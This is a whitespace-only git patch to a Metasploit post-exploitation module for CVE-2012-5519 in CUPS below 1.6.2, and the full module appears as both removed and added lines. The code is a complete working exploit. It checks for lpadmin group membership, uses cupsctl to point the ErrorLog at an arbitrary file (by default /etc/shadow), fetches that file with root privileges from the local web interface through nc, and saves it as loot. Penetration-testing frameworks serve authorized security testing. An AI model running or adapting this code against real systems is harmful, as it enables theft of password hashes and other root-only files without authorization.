From 9b9e1592fd7d6c0b3fda0c41441b74cad0b7ab72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Sep 2013 10:13:38 -0500 Subject: [PATCH] Retab changes --- .../multi/escalate/cups_root_file_read.rb | 262 +++++++++--------- 1 file changed, 131 insertions(+), 131 deletions(-) diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index 96199d6884..343779403e 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -6,167 +6,167 @@ ## class Metasploit3 < Msf::Post - include Msf::Post::File - include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Common - LP_GROUPS = ['lpadmin', '_lpadmin'] + LP_GROUPS = ['lpadmin', '_lpadmin'] - attr_accessor :web_server_was_disabled, :error_log_was_reset + attr_accessor :web_server_was_disabled, :error_log_was_reset - def initialize(info={}) - super( update_info( info, { - 'Name' => 'CUPS 1.6.1 Root File Read', - 'Description' => %q{ - This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system. - CUPS allows members of the lpadmin group to make changes to the cupsd.conf - configuration, which can specify an Error Log path. When the user visits the - Error Log page in the web interface, the cupsd daemon (running with setuid root) - reads the Error Log path and echoes it as plaintext. + def initialize(info={}) + super( update_info( info, { + 'Name' => 'CUPS 1.6.1 Root File Read', + 'Description' => %q{ + This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system. + CUPS allows members of the lpadmin group to make changes to the cupsd.conf + configuration, which can specify an Error Log path. When the user visits the + Error Log page in the web interface, the cupsd daemon (running with setuid root) + reads the Error Log path and echoes it as plaintext. - This module is known to work on: + This module is known to work on: - - Mac OS X < 10.8.4 - - Ubuntu Desktop <= 12.0.4 + - Mac OS X < 10.8.4 + - Ubuntu Desktop <= 12.0.4 - ...as long as the session is in the lpadmin group. + ...as long as the session is in the lpadmin group. - Warning: if the user has set up a custom path to the CUPS error log, - this module might fail to reset that path correctly. You can specify - a custom error log path with the ERROR_LOG datastore option. - }, - 'References' => - [ - ['CVE', '2012-5519'], - ['OSVDB', '87635'], - ['URL', 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791'] - ], - 'License' => MSF_LICENSE, - 'Author' => - [ - "Jann Horn", # discovery - "joev " # metasploit module - ], - 'DisclosureDate' => 'Nov 20 2012', - 'Platform' => ['osx', 'linux'] - })) - register_options([ - OptString.new("FILE", [true, "The file to steal.", "/etc/shadow"]), - OptString.new("ERROR_LOG", - [true, "The original path to the CUPS error log", '/var/log/cups/error_log'] - ) - ], self.class) - end + Warning: if the user has set up a custom path to the CUPS error log, + this module might fail to reset that path correctly. You can specify + a custom error log path with the ERROR_LOG datastore option. + }, + 'References' => + [ + ['CVE', '2012-5519'], + ['OSVDB', '87635'], + ['URL', 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791'] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + "Jann Horn", # discovery + "joev " # metasploit module + ], + 'DisclosureDate' => 'Nov 20 2012', + 'Platform' => ['osx', 'linux'] + })) + register_options([ + OptString.new("FILE", [true, "The file to steal.", "/etc/shadow"]), + OptString.new("ERROR_LOG", + [true, "The original path to the CUPS error log", '/var/log/cups/error_log'] + ) + ], self.class) + end - def check_exploitability - user = cmd_exec("whoami") - user_groups = cmd_exec("groups #{[user].shelljoin}").split(/\s+/) - if (user_groups & LP_GROUPS).empty? - print_error "User not in lpadmin group." - return Msf::Exploit::CheckCode::Safe - else - print_good "User in lpadmin group, continuing..." - end + def check_exploitability + user = cmd_exec("whoami") + user_groups = cmd_exec("groups #{[user].shelljoin}").split(/\s+/) + if (user_groups & LP_GROUPS).empty? + print_error "User not in lpadmin group." + return Msf::Exploit::CheckCode::Safe + else + print_good "User in lpadmin group, continuing..." + end - if ctl_path.blank? - print_error "cupsctl binary not found in $PATH" - return Msf::Exploit::CheckCode::Safe - else - print_good "cupsctl binary found in $PATH" - end + if ctl_path.blank? + print_error "cupsctl binary not found in $PATH" + return Msf::Exploit::CheckCode::Safe + else + print_good "cupsctl binary found in $PATH" + end - nc_path = whereis("nc") - if nc_path.nil? or nc_path.blank? - print_error "Could not find nc executable" - return Msf::Exploit::CheckCode::Unknown - else - print_good "nc binary found in $PATH" - end + nc_path = whereis("nc") + if nc_path.nil? or nc_path.blank? + print_error "Could not find nc executable" + return Msf::Exploit::CheckCode::Unknown + else + print_good "nc binary found in $PATH" + end - config_path = whereis("cups-config") - config_vn = nil + config_path = whereis("cups-config") + config_vn = nil - if config_path.nil? or config_path.blank? - # cups-config not present, ask the web interface what vn it is - output = get_request('/') - if output =~ /title.*CUPS\s+([\d\.]+)/i - config_vn = $1.strip - end - else - config_vn = cmd_exec("cups-config --version").strip # use cups-config if installed - end + if config_path.nil? or config_path.blank? + # cups-config not present, ask the web interface what vn it is + output = get_request('/') + if output =~ /title.*CUPS\s+([\d\.]+)/i + config_vn = $1.strip + end + else + config_vn = cmd_exec("cups-config --version").strip # use cups-config if installed + end - print_status "Found CUPS #{config_vn}" + print_status "Found CUPS #{config_vn}" if config_vn.nil? print_error "Could not determine CUPS version." return Msf::Exploit::CheckCode::Unknown end - config_parts = config_vn.split('.') - if config_vn.to_f < 1.6 or (config_vn.to_f <= 1.6 and config_parts[2].to_i < 2) # <1.6.2 - Msf::Exploit::CheckCode::Vulnerable - else - Msf::Exploit::CheckCode::Safe - end - end + config_parts = config_vn.split('.') + if config_vn.to_f < 1.6 or (config_vn.to_f <= 1.6 and config_parts[2].to_i < 2) # <1.6.2 + Msf::Exploit::CheckCode::Vulnerable + else + Msf::Exploit::CheckCode::Safe + end + end - def run - if check_exploitability == Msf::Exploit::CheckCode::Safe - print_error "Target machine not vulnerable, bailing." - return - end + def run + if check_exploitability == Msf::Exploit::CheckCode::Safe + print_error "Target machine not vulnerable, bailing." + return + end - defaults = cmd_exec(ctl_path) - @web_server_was_disabled = defaults =~ /^WebInterface=no$/i + defaults = cmd_exec(ctl_path) + @web_server_was_disabled = defaults =~ /^WebInterface=no$/i - # first we set the error log to the path intended - cmd_exec("#{ctl_path} ErrorLog=#{datastore['FILE']}") - cmd_exec("#{ctl_path} WebInterface=yes") - @error_log_was_reset = true + # first we set the error log to the path intended + cmd_exec("#{ctl_path} ErrorLog=#{datastore['FILE']}") + cmd_exec("#{ctl_path} WebInterface=yes") + @error_log_was_reset = true - # now we go grab it from the ErrorLog route - file = strip_http_headers(get_request('/admin/log/error_log')) + # now we go grab it from the ErrorLog route + file = strip_http_headers(get_request('/admin/log/error_log')) - # and store as loot - f = File.basename(datastore['FILE']) - loot = store_loot('cups_file_read', 'application/octet-stream', session, file, f) - print_good("File #{datastore['FILE']} (#{file.length} bytes) saved to #{loot}") - end + # and store as loot + f = File.basename(datastore['FILE']) + loot = store_loot('cups_file_read', 'application/octet-stream', session, file, f) + print_good("File #{datastore['FILE']} (#{file.length} bytes) saved to #{loot}") + end - def cleanup - print_status "Cleaning up..." - cmd_exec("#{ctl_path} WebInterface=no") if web_server_was_disabled - cmd_exec("#{ctl_path} ErrorLog=#{prev_error_log_path}") if error_log_was_reset - super - end + def cleanup + print_status "Cleaning up..." + cmd_exec("#{ctl_path} WebInterface=no") if web_server_was_disabled + cmd_exec("#{ctl_path} ErrorLog=#{prev_error_log_path}") if error_log_was_reset + super + end - private + private - def prev_error_log_path; datastore['ERROR_LOG']; end - def ctl_path; @ctl_path ||= whereis("cupsctl"); end - def strip_http_headers(http); http.gsub(/\A(^.*\r\n)*/, ''); end + def prev_error_log_path; datastore['ERROR_LOG']; end + def ctl_path; @ctl_path ||= whereis("cupsctl"); end + def strip_http_headers(http); http.gsub(/\A(^.*\r\n)*/, ''); end - def whereis(exe) - line = cmd_exec("whereis #{exe}") - if line =~ /^\S+:\s*(\S*)/i - $1 # on ubuntu whereis returns "cupsctl: /usr/sbin/cupsctl" - else - line # on osx it just returns '/usr/sbin/cupsctl' - end - end + def whereis(exe) + line = cmd_exec("whereis #{exe}") + if line =~ /^\S+:\s*(\S*)/i + $1 # on ubuntu whereis returns "cupsctl: /usr/sbin/cupsctl" + else + line # on osx it just returns '/usr/sbin/cupsctl' + end + end - def get_request(uri) - output = perform_request(uri, 'nc -j localhost 631') + def get_request(uri) + output = perform_request(uri, 'nc -j localhost 631') - if output =~ /^usage: nc/ - output = perform_request(uri, 'nc localhost 631') - end + if output =~ /^usage: nc/ + output = perform_request(uri, 'nc localhost 631') + end - output - end + output + end - def perform_request(uri, nc_str) - # osx requires 3 newlines! - cmd_exec(['printf', "GET #{uri}\r\n\r\n\r\n".inspect, '|', nc_str].join(' ')) - end + def perform_request(uri, nc_str) + # osx requires 3 newlines! + cmd_exec(['printf', "GET #{uri}\r\n\r\n\r\n".inspect, '|', nc_str].join(' ')) + end end